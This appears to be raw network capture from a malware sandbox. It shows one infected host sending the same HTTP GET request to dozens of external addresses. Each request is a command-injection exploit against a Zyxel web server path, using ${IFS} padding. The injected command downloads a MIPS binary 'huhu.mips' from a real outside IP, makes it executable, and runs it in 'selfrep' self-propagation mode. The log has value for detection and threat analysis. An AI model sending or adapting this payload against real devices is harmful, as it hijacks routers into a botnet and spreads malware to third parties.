                                      Jan 19, 2024 17:29:22.573328018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2003192.168.2.1436826174.145.162.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573373079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2004192.168.2.1438962122.135.38.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573409081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2005192.168.2.145777624.188.192.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573431015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2006192.168.2.145863024.66.112.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573509932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2007192.168.2.144860052.79.92.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573529005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2008192.168.2.1446488104.20.106.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573559999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2009192.168.2.1434000107.34.42.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573613882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2010192.168.2.1433136167.93.150.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573661089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2011192.168.2.145235672.34.124.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573698997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2012192.168.2.144946837.141.224.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573740959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2013192.168.2.144903063.12.194.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573779106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2014192.168.2.1436034189.152.202.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573858023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2015192.168.2.1451818159.131.134.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573884964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2016192.168.2.144752491.15.30.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573908091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2017192.168.2.1450402216.144.31.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573937893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2018192.168.2.143989425.3.91.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.573972940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2019192.168.2.144423631.250.119.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574037075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2020192.168.2.1441266104.144.76.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574074984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2021192.168.2.1460326200.35.191.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574114084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2022192.168.2.1448248170.55.156.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574151993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2023192.168.2.1460742202.99.59.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574198961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2024192.168.2.1434264188.66.17.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574230909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2025192.168.2.1449180163.176.225.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574265957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2026192.168.2.1457650173.103.209.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574296951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2027192.168.2.143347061.253.45.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574322939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2028192.168.2.1444632148.51.211.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574376106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2029192.168.2.14551805.166.142.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574409962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2030192.168.2.145927461.248.124.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574470997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2031192.168.2.1435676155.220.215.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574517965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2032192.168.2.143882212.79.234.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574552059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2033192.168.2.1441670133.150.0.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574604034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2034192.168.2.1445976202.180.168.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574662924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2035192.168.2.145507051.64.16.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574695110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2036192.168.2.1436446124.52.57.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574731112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2037192.168.2.144879017.5.46.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574750900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2038192.168.2.1435644135.80.50.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574794054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2039192.168.2.143745692.116.198.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574856997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2040192.168.2.144005472.91.252.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574881077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2041192.168.2.1448670159.2.166.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574939966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2042192.168.2.1458964177.205.244.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.574966908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2043192.168.2.1458132122.91.180.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575001955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2044192.168.2.1448460222.189.239.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575042963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2045192.168.2.1450994223.177.254.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575083971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2046192.168.2.1439836212.188.99.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575139999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2047192.168.2.1456260116.133.179.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575176954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2048192.168.2.145772054.148.148.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575196028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2049192.168.2.145879472.63.205.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575243950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2050192.168.2.144383485.185.194.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575278044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2051192.168.2.145076440.98.181.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575319052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2052192.168.2.145807439.37.13.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575355053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2053192.168.2.1441866221.51.69.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575393915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2054192.168.2.1445372201.222.129.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575439930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2055192.168.2.1441228115.178.224.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575464964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2056192.168.2.1445682192.214.172.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575509071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2057192.168.2.145450280.96.194.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575541973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2058192.168.2.1449620188.107.176.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575588942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2059192.168.2.1445022113.72.138.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575633049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2060192.168.2.1447942124.185.243.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575666904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2061192.168.2.1451692147.111.72.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575691938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2062192.168.2.144148889.68.41.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575723886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2063192.168.2.1433668190.20.100.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575777054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2064192.168.2.1449154199.20.149.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575815916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2065192.168.2.1460048180.64.155.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.575851917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2066192.168.2.1451116201.91.66.225443
                                      TimestampBytes transferredDirectionData
